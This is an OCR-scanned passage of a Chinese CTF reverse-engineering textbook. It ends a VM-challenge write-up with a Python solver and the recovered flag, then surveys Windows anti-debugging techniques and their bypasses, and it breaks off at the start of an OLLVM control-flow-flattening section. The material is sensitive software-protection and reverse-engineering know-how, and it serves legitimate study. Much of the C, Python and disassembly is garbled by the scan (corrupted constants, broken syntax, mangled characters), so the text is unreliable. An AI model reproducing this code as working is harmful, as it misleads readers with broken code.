label_333:; reg[6] = 256; 


label_340; reg[9] += reg[2]; 
label_345: menm[reg[9]] = reg[1]; 
LabeL_349: reg[3] += 1; 

label_357: g-cmp_result = reg[3] ~ 99; 
label_367: if (gcmp_result<=0) goto label_381; 
label_374: reg[8] = 1; 

label_381: reg[3] = 181; 

label_388: goto label_588; 

label_395: reg[9] = reg[3]; 

label_399: reg[2] eQg[9]; 

label_403: reg[6] = 9; 

label_410: reg[9] += reg[2]; 
label_415: reg[96] = mem[reg[9]]; 
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g-cmp_result = reg[9] - 48; 
if (g_cmp_result!=0) goto Labet_515; 
reg[3] 


9; 
reg[9] += reg[2]; 
mem[reg[9]] = reg[1]; 
reg[8] = 9; 


] = 9; 
reg[9] += reg[2]; 
mem[reg[6]] = reg[1]; 
reg[3] -= 1; 
g-cmp_result = reg[8] - 1; 
sult==0) goto label_395; 


[ 
label_616: g_cmp_result = reg[6] - 48; 


label_626: if (g_cmp_result==0) goto label_21; 
label_633: return; 


我 们 便 可 以 直接 根据 反 汇 编 的 结果 对 程序 的 求解 算法 进行 分 析 ， 但 是 其 汇编 指令 较 多 ， 虽 然 分 析 的 难 
度 已 经 降低 了 不 少 ， 依 旧 存 在 些许 困难 。 有 心 的 读者 或 许 已 经 友 现 ， 在 编写 反 汇 编 器 时 ， 这 里 有 意 将 
输出 语句 的 格式 转化 为 了 类 C 语 言 的 语法 格式 ， 目 的 是 利用 优化 能 力 极 强 的 编译 器 对 这 些 汇编 语句 进 
行 “ 反 编译 ”。 所 以 ,我 们 可 以 对 上 述 反 汇编 结果 进一步 整理 ， 最 终 整理 为 如 下 可 供 C 编 译 器 编译 的 
格式 : 


#include <stdio.h> 
// 从 题目 中 提取 
char mem[5434] = {48, 48, 48, 48, 4H8, 48, 48, 4H8, 48, 48, 4H8, ...}; 
void main_logic() { 

int g_cmp_result; 

int reg[9] = {0}; 
label_0: 

reg[7] = 0; 
label_7: 

reg[8] = 1; 
label_1d: 

goto label_605; 
label_21: 

reg[4] = 0; 
label_28: 

reg[5] = 9; 
LabeL_35 : 
reg[6] = 9; 
// 此 处 省 略 若干 代码 
label_605: 

reg[0] = 1; 
label_612: 

reg[0] = mem[reg[9]]; 
label_616: 

g_cmp_result = reg[9] - 48; 
label_626: 

if (g_cmp_result == 0) goto LabeL_21; 
label_633: 

return; 
} 
int main() { 

main_logic(); 

return 09; 


选用 (编译 器 (如 MSVC) 配置 好 优化 选项 ， 编 译 上 述 代码 为 可 执行 程序 后 ， 再 使 用 IDA 的 HexRays 皇 
件 对 main_logic() 浮 数 进行 反 编译 ， 可 以 得 到 如 下 伪 代 码 (已 重 命名 部 分 变量 ) : 


void sub_d401000() 


int vO; 
int v1; 


la 
/1 [esp+uh] [ebp-4h] 


Sun = 0; 
while(current_path_1 == '0') 
{ 


w= ve+1; 
v5 = characters[(((ve + 1) * ve) >> 1) + v1]); 
current_solution[idx] = v5; 
New_Sum += v5; 
if (current_path_2[-idx + 99] == '1°) 
+*+v1; 
ve = vy; 
+*+idx; 
) while (idx ~ 99 <= 9); 
if (new_sum ~- Sum > 9) 
{ 
v6 = 0; 
do 


solution[v6] = current_solution[v6]; 
++V6i 
} while (v6 - 99 <= 0); 
} 
v7=1; 
v8 = 191; 
do 
{ 
v9 = current_path_gfv8]; 
1 


if (v9 == '0') 
上 


Current_path_g[v8] = v7 * '9' 1 
7= 0; 


current_path_g[v8] = v7 * v9; 


VS 
} while (v7 == 1); 
by 
J} 


此 时 的 代码 中 算法 逻辑 已 经 清晰 可 见 ， 编 译 器 帮助 我 们 完美 地 完成 了 优化 工作 。 访 程序 内 置 了 一 个 字 
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符 数 组 ， 观 察 生 成 flag (solution) 的 算法 可 以 友 现 ， 这 个 字符 数组 的 结构 应 该 为 一 个 如 下 所 示 的 三 
角形 


97NgL-fG 
0]zrYe, iuU 
QIbU~YB:$ 
S=>Pi:i-Uux* 
ip-Qoxs(|&@N 


生成 flag 的 算法 即 从 该 三 角形 项 上 后 (第 一 个 字符 ) 出 友 ， 通 过 穷 举 找到 达 底 层 的 具有 最 大 和 的 一 条 路 
径 。 这 是 一 个 简单 的 经 典 问题 ， 我 们 直接 使 用 动态 规划 进行 求解 即 可 : 


def solve(): 
def get_pos(x, y): return x*(x+1)//2+y 
def max(x, y): return x if x > y elsey 
# 字符 数组 
tbl L126. 116. 68 114 67,367 53 105,. 337 61 37 T7907 97. 1130 ™=1 
dp = [9] * 5050 
dp[9] = tbL[9] 
for i in range(1，169): 
dp[get_pos(i，i)] = dp[get_pos(i-1, i-1)] + tbl[get_pos(i, i)] 
dp[get_pos(i, 0)] = dp[get_pos(i-1, 0)] + tbl[get_pos(i, 0)] 
for i in range(2, 100): 
for j in range(l1, i): 
dp[get_pos(i, j)] = max(dp[get_pos(i-1, j)], dp[get_pos(i-1, j-1)]) + tbl[get_pos(i, j)] 
m=0 
idx = 0 
for i in range(100): 
if dp[get_pos(99, i)] >= m: 
m= dp[get_pos(99, i)] 
idx = 革 
flag = "" 
for i in range(99, 0, -1): 
flag = chr(tbl[get_pos(i, idx)]) + flag 
if dp[get_pos(i-1, idx-1)] > dp[get_pos(i-1, idx)]: 
idx -= 1 
flag = chrCtbL[6]) + flag 
print(flag) 


使 用 Python 运行 求解 脚本 ， 输 出 如 下 : 


signal_vm_2> python .\dp.py 
~triangle~is~a~polygon~delctf{no~n33d~70~c4lLcul473~3v3ry~p47h} 
with~three~edges~and~three~vertices~~~ 


至 此 ， 我 们 便 完 成 了 这 道 VM 逆 向 题 的 求解 。 注 意 ，CTF 中 并 非 所 有 的 VM 类 题 型 都 需要 使 用 这 种 方法 
进行 解 题 ， 对 于 虚拟 字 节 码 数 量 较 小 、VM 执 行 器 逻辑 较为 简单 的 题 而 言 ， 一 种 极其 高 效 的 方法 是 在 
调试 时 跟 路 与 记录 运行 的 指令 (俗称 “ 打 log”) ， 可 以 依赖 的 工具 有 IDAPython、GDB scrip 域 各 
类 Hook 框 架 。 这 种 方式 不 需要 对 VM 执行 器 进行 完整 逆向 ， 里 然 不 能 完整 地 还 原 出 验证 逻辑 ， 但 能 帮 
助 我 们 帘 探 出 一 部 分 的 运行 逻辑 ， 有 经 验 的 逆向 选手 借 此 甚至 可 以 推测 出 完整 的 逻辑 ， 从 而 快速 完成 
解 题 。 因 此 ， 在 实际 竞赛 中 ， 我 们 要 灵活 处 理 各 种 情况 ， 找 到 最 优 的 解 题 方式 进行 解 题 。 


5.5.3 反 调 试 

无 论 是 在 CTF 还 是 在 实际 生产 环境 中 ， 反 调试 (Anti-debugging) 都 是 极其 常见 的 软件 保护 手段 。 
我 们 知道 ， 对 一 个 程序 进行 送 同 分 析 往 往 少不了 动态 调试 的 过 程 。 所 谓 反 调试 ， 是 指 在 程序 代码 中 运 
用 大 干 种 反 调试 拉 术 ， 干 扰 对 某 个 进程 进行 动态 调试 、 送 向 分 析 的 手段 。 


反 调 试 扩 术 很 多 ， 有 的 是 基于 进程 在 调试 、 未 被 调试 这 两 种 状态 下 的 微小 差异 而 实现 的 。 例 如 ， a 
下 正在 被 调试 的 进程 的 Process Environment Block (PEB) 中 的 BeingDebugged 字 段 会 被 设 

置 为 True， 由 此 诞生 了 IsDebuggerPresent(0API， 它 能 检测 当前 进程 是 否 正在 被 调试 。 有 的 反 调 试 

技术 巧妙 利用 了 调试 器 的 实现 原理 ， 如 普通 调试 器 会 通过 对 内 人 进 行 修改 实现 软件 断 点 (如 将 有 某 捐 令 

的 起 始 字 忆 设置 为 INT 3 的 字 节 码 0xCC， 随 后 监听 EXCEPTION_BREAKPOINT 异 常 ) ， 由 此 诞生 了 基 

于 内 人 和 存 校 验 的 断 点 检测 方式 。 有 的 芭 调 试 手段 运用 到 了 操作 系统 所 提供 的 AP 特性 ， 如 在 Linux 系 统 下 

调用 ptrace (PTRACE TRACEME) ， 将 使 得 当前 进程 处 于 其 父 进 程 的 跟踪 (调试 ) 状态 下 ,依据 
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规定 ， 此 时 其 他 调试 器 便 无 法 再 对 当前 进程 进行 调试 。 


还 有 许多 更 加 复杂 的 反 调试 技术 ， 但 它们 并 非 牢 不 可 破 ， 对 于 上 述 简单 例子 及 用 的 有 反 调试 技术 而 言 ， 
我 们 各 了 解 其 工作 原理 ， 便 可 以 轻松 对 它们 进 ， 从 而 降低 后 续 逆向 过 程 的 复杂 度 。 De 
oleleMAAS 
的 应 用 层 程序 为 例 ， 介 绍 一 些 单 见 的 芭 调试 扩 术 及 其 绕 过 方法 。 


1. Windows API 


Windows 操 作 系统 提供 了 大 量 可 供 检测 进程 状态 的 API， 通 过 调用 这 些 API， 程 序 可 以 检测 当前 是 否 
正在 被 调试 。 


(1)lsDebuggerPresent() 


bool CheckDebug1() { 
BOOL ret; 
ret = IsDebuggerPresent(); 
eturn ret; 


(2)CheckRemoteDebuggerPresent() 


bool CheckDebug2() { 


CheckRemoteDebuggerpresent(GetCurrentProcess(), &ret); 
return ret; 


} 


EIN ela knell Me 


typedef NTSTATUS(WINAPI* NtQueryInformationPprocessptr)( 
HANDLE processHandle, 
PROCESSINFOCLASS processInformationCLass， 
PVOID processInformation, 
ULONG processInformationLength, 
PULONG returnLength 
3 


bool CheckDebug3() { 

int debugPort = 0; 

HMODULE hModule = LoadLibrary(L"NtdLL.dLL"D) ; 

NtQueryInformationProcessPtr NtQueryInformationProcess = 
(NtQueryInformationprocessptr)GetProcAddress(hModule, "NtQueryInformationprocess"); 

NtQueryInformationprocess(GetCurrentProcess(), (PROCESSINFOCLASS)Qx7, &debugPort, 

sizeof(debugport), NULL); 
return debugPort != 0; 


它们 各 自 实 现 检测 的 原理 均 不 相同 JN Ed Eele] d=) 
的 API。 例 如 ， 对 于 CheckDebug1 而 言 ，lsDebuggerPresent 实 际 直接 返回 PEB 中 的 


Bein ebyg ed 
字段 的 值 ， 我 们 可 以 编写 Hook 国 数 ， 强 制 该 AP 永远 返回 False; 对 于 CheckDebug3 我 们 


同样 可 以 编写 Hook 函 数 ， 对 NtQuerylnformationProcess 进 行 Hook， 并 在 第 二 个 参数 为 0x7 时 强 
行 对 第 三 个 参数 清 零 并 返回 。 目 前 ， 业 界 已 经 有 许多 非常 优秀 的 工具 能 帮助 我 们 目 动 Hook 该 类 APl， 
并 目 动 绕 过 相当 一 部 分 的 反 调 试 ， 如 一 款 强 有 力 的 用 户 态 反 反 调 试 工 具 ScyllaHide (https:// 
.Ccom/x64dbg/ScyllaHide) ， 能 作为 ONlyDbg、x64dbg、1IDA 等 常用 工具 的 插件 运行 ， 也 更 拘 闪 
立 运行 。 其 最 新 版 本 能 够 绕 过 VMProtect 3.x 的 芭 调试 ， 感 兴趣 的 读者 可 以 自行 探索 。 


2. 断 点 检测 


一 般 来 说 ， 在 调试 过 程 中 常用 到 的 两 种 类 型 为 软件 断 点 和 硬件 断 点 。 软 件 断 点 往往 通过 修改 内 存 而 实 
现 (注意 有 别 于 内 存 断 点 ) ， 对 内 存 是 否 被 修改 进行 检测 ， 便 可 以 探测 该 类 断 点 的 存在 。 例 如 ， 对 一 
个 经 典 的 MFC CrackMe 程 序 进行 断 点 检测 保护 ， 该 程序 的 验证 逻辑 在 OnBnClickedButton1 函 数 
中 ， 那 么 我 们 可 以 这 样 做 : 


DWORD addr3; 

int sum = 0; 

void CALLBACK TimerProc( 
HWND hwnd ，， // handle of CWnd that called SetTimer 
UINT nMsg, // WM_TIMER 
UINT_PTR nIDEvent, // timer identification 


DWORD dwTime // system time 
用 

DWORD pid; 

GetWindowThreadProcessId(hWnd, &pid); 

HANDLE handle = Openprocess(PROCESS_ALL_ACCESS, false, pid); 

// 使 用 自 编 的 MyGetProcAddress， 训 免 因为 高 版 本 的 兼容 问题 而 获取 到 不 正确 的 函数 地 址 

DWORD addrl = MyGetProcAddress(GetModuleHandleA(("User32.d11")), "MessageBoxW"); 

DWORD addr2 = MyGetProcAddress(GetModuleHandleA("User32.dl1"), "GetWindowTextW"); 
#define CHECK_SIZE 209 

char bufl, buf2 

char bu aoteecsrze = {9} ; 

SIZET 

// Mes % 首 字 节 

ReadProcessMemory(handle, (LPCVOID)addr1, &bufl, 1, &size); 

J A 首 字 区 
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ReadProcessMemory(handle, (LPCVOID)addr2, &buf2, 1, &size); 
// OnBnClickedButtonl 函数 中 拍 取 299 字 节 
ReadProcessMemory(handle, (LPCVOID)addr3, &buf3, CHECK_SIZE, &size); 
int currentSum = 0; 
for (int i = 6; i < CHECK_SIZE; i++) { 
currentSum += buf3[i]; 


} 
if (sum) { // global 
if (currentSum != sum) { 
Terminateprocess(handle, 1); // 校 验 和 异常 ， 退 出 程序 
} 
else { 
sum = currentSum; 


} 
if ((byte)bufl == 9xcc || (byte)buf2 == 9xcc] { 
TerminateProcess(handle, 1); // 检测 到 INT 3 断 点 ， 退 出 程序 


} 
CloseHandle(handle); 


于 
// 程序 初始 化 部 分 代码 


addr3 = (DWORD)pointer_cast<void*>(&CMFCAppLication1DLg: :OnBnClickedButton1); 
SetTimer(1, 160, Timer| 让 


这 段 代 码 将 检测 设置 在 OnBnClickedButton1 函 数 前 200 字 节 范 围 内 的 软件 断 点 以 及 设置 在 ee 
@SSAQEDOX 
(弹出 正确 与 否 的 信息 框 ) 、GetWindowTextW (获取 用 户 输入 ) 两 个 AP| 起 始 处 的 8 
， 并 在 检测 到 断 点 后 调用 TerminateProcess 退 出 程序 。 代 码 中 使 用 了 自行 编写 的 
ee De 
， 实 际 上 它 束 是 该 函数 低 版 本 的 实现 ， 因 为 该 函数 高 版 本 实现 中 考虑 到 了 兼容 问题 ， 其 返回 的 地 
址 便 已 不 再 是 我 们 在 调试 器 中 看 到 的 真实 API 入 口 点 (详细 原因 读者 可 以 自行 查阅 ) 。 知 要 绕 过 这 种 
检测 ， 我 们 可 以 通过 逆向 程序 ， 找 到 相应 的 检测 逻辑 ， 然 后 将 其 去 除 ; 在 断 点 需求 少 的 时 候 ， 我 们 也 
可 以 尽量 使 用 硬件 断 点 进行 调试 。 


对 于 X86 架构 ， 硬 件 断 点 是 通过 设置 调试 寄存 器 (Debug Registers， 包 括 DR0~ DR7) 来 实现 的 。 
当 我 们 需要 使 用 硬件 断 点 时 ,需要 将 断 点 的 地 址 设置 到 DR0 ~ DR3 中 (因此 最 多 仅 支 持 4 个 硬件 断 
挟 ) ， 并 将 一 些 控制 属性 设置 到 DR7 中 ， 基 于 这 个 原理 可 以 编写 检测 硬件 断 点 的 代码 : 


#include <stdio.h> 
#include <Windows.h> 
bool CheckHWBP() { 
CONTEXT ctx = {}; 
ctx.ContextFlags = CONTEXT_DEBUG_REGISTERS ; 
if (GetThreadContext(GetCurrentThread(), &ctx)) { 
return ctx.Drg != 0 || ctx.Drl != 0 || ctx.Dr2 != 0 || ctx.Dr3 != 0; 
return false; 
} 
int main() { 
7 
Some codes 
*/ 
if (CheckHWBP()) { 
printf("HW breakpoint detected!\n"); 
exit(0); 
/* 
Some other codes 
*/ 


return 0; 


编译 该 代码 ， 用 x64dbg 调 试 main 了 为 数 并 在 检测 前 下 一 个 硬件 断 点 ， 可 以 看 到 程序 成 功 检测 到 了 该 硬 
件 断 后 的 仔 企 ， 见 图 5-5-5。 


这 种 检测 方式 同样 调用 了 操作 系统 提供 的 API GetThreadContext， 因 此 我 们 依旧 可 以 采取 Hook 的 方 
式 来 绕 过 此 类 检测 ， 前 面 提 到 的 ScyllaHide 工 具 便 基于 类 似 原 理 ， 提 供 了 DRx Protection 选 项 来 反 硬 
件 断 点 探测 。 


3 .时间 间隔 检测 


在 单 步 跟踪 一 段 指令 上 时， 指令 运 行 所 耗费 的 时 间 与 其 未 被 跟踪 时 的 相差 巨大 。 基 于 这 个 原理 ， 我 们 能 
9h ee 
中 存在 一 个 名 为 TSC (Time Stamp Counter， 时 间 惟 计数 器 ) 的 64 位 寄存 器 。CPU 会 对 每 个 时 钟 
周期 计数 ， 然 后 保存 到 TSC，RDTSC 指 令 便 是 用 来 将 TSC 的 值 半 入 EDX: EAX 青 存 器 中 的 ， 因此 

指令 可 以 被 用 来 进行 时 间 探 测 。 一 般 ， 实 现 这 种 反 调试 我 们 只 需 探测 TSC 的 低 32 位 的 变化 量 即 可 
( 即 EAX 的 变化 量 ) ， 在 没有 检测 变化 量 下 界 的 情况 下 ， 我 们 可 以 直接 将 程序 中 所 有 相关 RDTSC (OF 
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31) 指令 茶 损 成 XOR EAX，EAX (33 C0) 指令 ， 绕 过 这 种 检测 ， 


S| DO007FF62BE8106E CC ne 


00007FF62BES106F CC 
48: 81EC 08050000 sub rsp,5 
[oooo7FeeseE 0977 |] 48:8B80s SA1F0000 V rax, qword ptr ds: (cesecunityacoouies) 
4 
D 


p 
48: ;898424 F0040000 mov Fd ptr s s:Ersp+4F0W, rax 
48; 5D4C24 20 lea es qword ptr ss:Brsp+20W 
41:B8 DO040000 


E8 570C0000 ca 
C74424 50 10001000 r 
FF15 570F0000 all ord ptr pi 


48:8D5424 20 全 ptr 35: 

FF15 510F0000 ti qword ptr ds 

85C0 
v 74 38 

48:837C24 68 00 
v 75 18 

48:837C24 70 00 qword ptr ss: 有 Ersp+70,0 
v» 75 33 

48:837C24 78 00 qword ptr ss: 中 rsp+75,0 
到 

48: 838C24 80000000 00 ee 
2 


电 


48: 8DOD 4811 
E8 26FFFFFF 
33C9 





了 了 [| | 
XOr eCX ,ec 
. FF G2 E ETT qword ptr ds 
| 00007FF62#ES1O0F2 ee int3 
O0007FF62EES1IOF3 33C0 Xor eax,eax 
O0007FF62BES1O0FS 48: 888C24 F0040000 mov rcx,qword ptr ss:rsp+4FO0M 
DOOD0 b OED “了 3 D = SE 


consoleapplicationi,. exe rm |mov rax,aword ptr ds:[ 





图 5-5-5 
4. 基于 异常 的 反 调 试 


在 Windows 系 统 中 ， 若 某 进程 正在 被 另 一 进程 调试 ， 则 其 运行 过 程 中 产生 的 异常 将 首先 由 其 调试 器 进 
行 处 理 ， 否 则 会 直接 由 进程 中 注册 的 SEH (Structured Exception Handling) 处 理 函 数 进行 处 
理 。 所 谓 SEH， 就 是 一 种 能 在 一 个 线程 出 现 错误 的 时 候 令 操作 系统 调用 用 户 自 定义 的 回调 函数 的 机 
制 。 所 以 ,我 们 可 以 编写 代码 ， 主 动 抛 出 一 个 异常 (如 执行 一 条 非法 指令 或 者 访问 一 段 非法 内 存 
等 ) ， 随 后 在 我 们 注册 的 SEH 处 理 肖 数 中 对 该 异常 进行 接管 ， 接 着 处 理 该 异常 ， 也 可 以 针对 性 地 进行 
一 些 反 调试 的 操作 。 其 中 ，SEH 处 理子 数 (回调 函数 ) 的 形式 如 下 : 


typedef 
_IRQL_requires_same_ 
_Function_ctLass_(EXCEPTION_ROUTINE) 
EXCEPTION_DISPOSITION 
NTAPI 
EXCEPTION_ROUTINE ( 
_Inout_ struct _EXCEPTION_RECORD *ExceptionRecord, 
_In_ PVOID EstablisherFrame, 
-Inout_ struct _CONTEXT *ContextRecord, 
_In_ PVOID DispatcherContext 
); 


typedef EXCEPTION_ROUTINE *PEXCEPTION_ROUTINE; 


其 中 ， 参 数 ContextRecord 是 我 们 需要 关注 的 内 容 ， 里 面包 括 了 许多 有 用 的 信息 ， 包 括 产生 异常 时 
的 线程 上 下 文 状态 中 的 所 有 信息 (如 通用 寄存 器 、 段 选择 子 、IP 寄 存 器 等 ) ， 我 们 可 以 通过 这 些 信息 
方便 地 控制 异常 处 理 的 进行 。 例 如 ， 如 果 需 要 在 异常 友 生 的 时 候 将 EIP 的 值 增 加 1 后 继续 执行 ， 那 么 可 
以 使 用 如 下 回调 函数 : 


EXCEPTION_DISPOSITION Handler(PEXCEPTION_RECORD ExceptionRecord, 
PVOID EstablisherFrame, 
PCONTEXT ContextRecord, 
PVOID DispatcherContext) { 
ContextRecord->Eip += 1; 
return ExceptionContinueExecution; 


} 


该 函数 在 返回 的 时 候 返 回 了 ExceptionContinueExecution， 告 诉 操作 系统 恢复 产生 异常 线程 的 执 
行 ; 此 外 ， 当 回调 函数 无 法 处 理 相 应 异常 时 ， 需 要 返回 ExceptionContinueSearch， 以 告诉 操作 系统 
继续 寻找 下 一 个 回调 函数 ， 如 果 没 有 下 一 个 回调 函数 可 以 接管 该 异常 ， 那 么 操作 系统 会 根据 相应 的 注 
册 表 项 ， 决 定 是 终止 应 用 程序 还 是 调用 某 调试 器 对 其 进行 附加 调试 。 我 们 该 如 何 注册 SEH 回 调 函 数 
呢 ? 从 原理 上 看 ， 我 们 只 需 将 待 注册 函数 加 入 SEH 链 中 即 可 ，SEH 链 中 的 项 均 是 如 下 结构 体 : 


typedef struct _EXCEPTION_REGISTRATION_RECORD { 
struct _EXCEPTION_REGISTRATION_RECORD *Next; 
PEXCEPTION_ROUTINE Handler; 

} EXCEPTION_REGISTRATION_RECORD; 


其 中 ，Next 为 指 同 链 中 下 一 个 项 的 措 针 ，Handler 为 对 应 的 回 凋 消 数据 针 。 在 32 位 汇编 代码 中 ， 我 们 
往往 会 看 到 如 下 操作 ， 其 作用 是 在 栈 上 构造 一 个 EXCEPTION_REGISTRATION_RECORD 结 构 体 : 


PUSH handler 
PUSH FS:[0] 
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在 这 两 条 指令 后 ， 栈 上 便 会 有 一 个 8 字 节 的 EXCEPTION REGISTRATION _ RECORD 结构 体 ， 随 后 往往 
会 有 一 条 像 下 面 的 指令 将 刚才 构造 好 的 结构 体 链接 到 当前 的 SEH 链 上 : 


MOV Fs:[e], ESP 


这 个 操作 使 得 线程 信息 块 ( 即 TIB， 位 于 线程 环境 块 TEB 的 起 始 位 置 ) om i ee 
_REGISTRATION_RECORD 结 构 ( 即 新 的 SEH 链 的 头 部 ) ， 当 前 线程 的 TEB 可 通过 FS 寄存 


器 来 访问 ， 它 的 线性 地 址 存放 在 FS: [0x18] 中 。 其 中 ，TEB 与 TIB 的 部 分 定义 如 下 所 示 : 


typedef struct _TEB { 
NT_TIB Tib; 
PVOID EnvironmentPointer; 
CLIENT_ID Cid; 
PVOID ActiveRpcHandle; 
WA 
} TEB, *PTEB; 
typedef struct _NT_TIB { 
struct _EXCEPTION_REGISTRATION_RECORD *ExceptionList; 


PVOID StackBase; 
PVOID StackLimit; 
PVOID SubSystemTib; 
VA 

} NT_TIB; 


对 于 利用 异常 机 制 编写 的 反 调试 手段 ， 我 们 一 般 需要 对 所 使 用 的 调试 器 进行 配置 ， 使 之 忽略 程序 产生 
的 一 些 特定 异常 ， 这 样 该 异常 就 会 依然 由 程序 本 身 进行 处 理 。 对 x64dbg 而 言 ， 可 以 通过 “顶部 菜单 
一 选项 一 选项 一 异常 一 添加 上 次 ”忽略 上 一 个 产生 的 异常 类 型 。 其 他 调试 器 同 理 。 此 外 ， 在 CTF 中 或 
实际 逆向 工作 中 ， 我 们 可 能 遇 到 更 复杂 的 基于 异常 的 反 调试 手段 ， 如 在 0CTF/TCTF 2020 Quals 中 有 
一 道 逆向 题 “J”， 其 关键 处 理 逻 辑 中 ， 所 有 的 条 件 跳 转 指令 均 被 处 理 成 了 INT 3， 随 后 在 程序 自己 注 
册 的 异常 处 理 函 数 中 ， 程 序 根据 RFLAGS 的 状态 和 异常 友 生 的 地 址 模拟 实现 了 这 些 条 件 跳 转 指 令 的 执 
行 ， 从 而 实现 反 调试 以 及 混淆 的 目的 。 其 实 ， 这 种 保护 方式 在 很 早 就 出 现在 了 一 些 加 密 壳 软 件 中 (如 
Armadillo) ， 并 被 俗称 为 “CC 保护 ”。 面 对 类 似 的 保护 手段 ， 我 们 需要 耐心 ， 认 真 对 异常 处 理 函 数 
的 逻辑 进行 逆向 分 析 ， 将 原本 的 指令 恢复 ， 才 能 为 后 续 的 分 析 铺 垫 道路 。 


5. TLS 反 调试 


Thread Local Storage (TLS) ， 即 线程 本 地 存储 ， 是 为 解决 一 个 进程 中 多 个 线程 同时 访问 全 局 变量 
而 提供 的 机 制 。 为 了 方便 开发 者 对 TLS 中 的 数据 对 象 进 行 一 些 额 外 的 初始 化 或 销毁 操作 ，Windows 提 
EE NS 
于 这 种 隐蔽 性 ， 许 多 开 太 者 喜欢 任 TLS 回 调 函 数 中 编写 调试 器 检测 代码 ， 实 现 芭 调试 。 因 此 ， 我 们 可 
以 使 用 IDA 对 程序 进行 静态 分 析 。1DA 能 很 好 地 对 程序 的 TLS 回 调 国 数 进 行 识别 ， 随 后 可 以 对 其 反 调 试 
逻辑 进行 逆向 分 析 。 对 于 动态 调试 而 言 ， 以 x64dbg 为 例 ， 可 以 在 “顶部 菜单 一 选项 一 选项 一 事件 ” 
中 勾 选 “TLS 回 调 消 数 ” 项 ， 表 调试 程序 ， 调 试 器 便 会 在 该 程序 的 TLS 回 调 消 数 被 调用 前 暂停 ,方便 跟 
路 和 分 析 。 


6. 特定 调试 器 检测 


反 调 试 技术 中 有 一 种 简单 粗暴 的 万 式 就 是 直接 对 特定 调试 器 进行 探测 。 例 如 ，x64dbg 可 以 检测 当前 
系统 运行 程序 的 可 见 窗口 中 有 无 包含 “x64dbg ”的 窗口 或 进程 列表 中 有 无 名 为 “x64dbg.exe” 的 进 
程 等 ， 这 种 检测 方式 依赖 对 诸如 EnumWindows 等 API 的 调用 ， 并 且 强 度 很 低 、 易 被 友 现 ， 因 此 容易 
馈 绕 过 。 此 外 存在 一 些 利 用 特定 调试 器 特性 的 检测 万 式 ， 例 如 : 


G@oOllyDbg 的 早期 版 本 对 OutputDebugstringA 发 送 的 字符 串 进 行 操作 时 和 存在 一 个 格式 化 字符 串 的 漏 
洞 ， 利 用 该 漏洞 可 以 直接 让 调试 器 朋 溃 。 


Q@OOllyDbg 的 早期 版 本 对 硬件 断 点 的 处 理 逻 辑 仓 在 问题 ， 导 致 程序 主动 设置 的 DRx 在 某 些 情况 下 会 被 
重 设 ， 因 此 我 们 可 以 探测 OllyDbg。 


G@WinDbg 会 对 其 启动 的 调试 进程 设置 若干 特有 的 环境 变量 ， 如 WINDBG_DIR、SRCSRV_ SHOW _TF 
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_PROMPT 等 ， 探 测 这 些 环境 变量 是 否 存 在 可 以 实现 对 WinDbg 的 检测 。 
还 有 许多 角度 异常 刁钻 却 又 有 趣 的 检测 手段 ， 在 CTF 中 ， 我 们 遇 到 可 疑 的 类 似 手 段 ， 要 学 会 积极 运用 
搜索 引擎 进行 检索 ， 并 掌握 它们 的 绕 过 方法 。 


7. 架构 切换 


64 位 Windows 操 作 系 统 依旧 可 以 运行 32 位 的 应 用 程序 ， 实 际 上 ， 此 时 32 位 的 程序 是 运行 在 Windows 
提供 的 一 个 兼容 层 WoW64 上 ， 而 架构 的 切换 对 于 运行 在 WoW64 环 境 下 的 程序 是 必 不 可 少 的 。 运 行 
在 64 位 Windows 系 统 下 的 32 位 程序 在 进入 系统 调用 前 均 需要 完成 架构 的 切换 ， 这 是 通过 wow64cpu. 
dll 中 一 个 俗称 Heaven's Gate 的 部 分 来 完成 的 。 实 际 上 ， 它 的 逻辑 非常 简单 ， 可 以 用 如 下 几 条 指令 摘 
述 : 


真实 情况 中 是 通过 fword jmp 来 实现 的 ， 其 原理 与 retf 尖 似 。 同 样 ， 将 CPU 从 64 位 执行 状态 切换 回 32 
位 状态 ， 可 以 用 如 下 几 条 指令 : 


有 天 WoW64 的 实现 细节 ， 感 兴趣 的 读者 可 以 目 行 利 用 搜索 引 警 查阅。 严格 来 襄 ， 这 种 万 式 并 不 能 科 
称 为 反 调试 技巧 ， 但 Windows 下 大 部 分 的 用 户 态 调试 器 均 无 法 对 架构 切换 后 的 代码 进行 跟 路 ， 因 此 我 
们 推荐 使 用 WinDbg (x64) 进行 动态 调试 ， 在 retf 等 指令 处 设置 断 点 ， 待 断 点 被 触发 后 step-in， 调 
试 器 便 会 目 动 切换 到 另 一 弦 构 模式 ， 此 后 调试 器 的 寄 仓 器 、 栈 、 地 址 空间 等 都 会 目 动 适 配 到 64 位 的 模 
式 。 笔 者 在 “ 空 指针 ”的 公开 赛 赛 题 GatesXGame (https://www.npointer.cn/question.html? 
id=5) 中 残 使 用 了 这 种 类 型 的 代码 ， 感 兴趣 的 读者 可 以 去 练习 ， 擎 握 调 试 它 的 方法 并 获得 flag。 


本 节 仅 列举 了 Windows 应 用 层 的 几 个 常见 的 简易 反 调 试 技 术 ， 实 际 上 ， 针 对 不 同 特权 等 级 、 不 同 操作 
系统 ， 还 有 大 量 各 式 各 样 的 反 调试 技术 ， 当 我 们 在 CTF 或 实际 工作 中 遇 到 它们 时 ,切忌 手忙脚乱 ， 静 
下 心 来 ， 将 其 中 的 原理 研究 透彻 ， 并 在 日 后 积极 总 结 ， 方 可 在 下 一 次 处 理 同类 问题 时 达到 询 丁 解 牛 的 
境界 。 


5.5.4 污 谈 ollvm 

OLLVM (Obfuscator-LLVM) 是 基于 LLVM (Low Level Virtual Machine) 实现 的 一 个 控制 流 平 
坦 化 混淆 工具 ， 来 自 2010 年 的 论文 Obfuscating C+ +Programs via Control Flow Flattening， 其 主 
要 思想 是 将 程序 的 基本 块 之 间 的 控制 关系 打 乱 ， 而 交 由 统一 的 分 发 器 进行 管理 。 例 如 ， 图 5-5-6 是 一 
个 正常 程序 的 控制 流 图 ， 而 图 5-5-7 是 其 经 过 控制 流 平 坦 化 处 理 后 的 控制 流 图 。 


可 以 看 出 ， 控 制 流 平坦 化 的 特征 非常 明显 ， 整 个 程序 的 执行 流程 通过 一 个 主 分 友 器 来 控制 ， 每 个 基本 
块 结束 后 会 根据 当前 的 状态 更 新 state 变 量 ， 从 而 决定 下 一 个 竺 执行 的 基本 块 。 分 友 器 的 结构 与 VM 的 
Handler 比 较 相 似 ， 要 分 辨 这 两 种 结构 ， 需 要 仔细 观察 控制 程序 执行 流程 的 关键 变量 。 要 解决 控制 流 
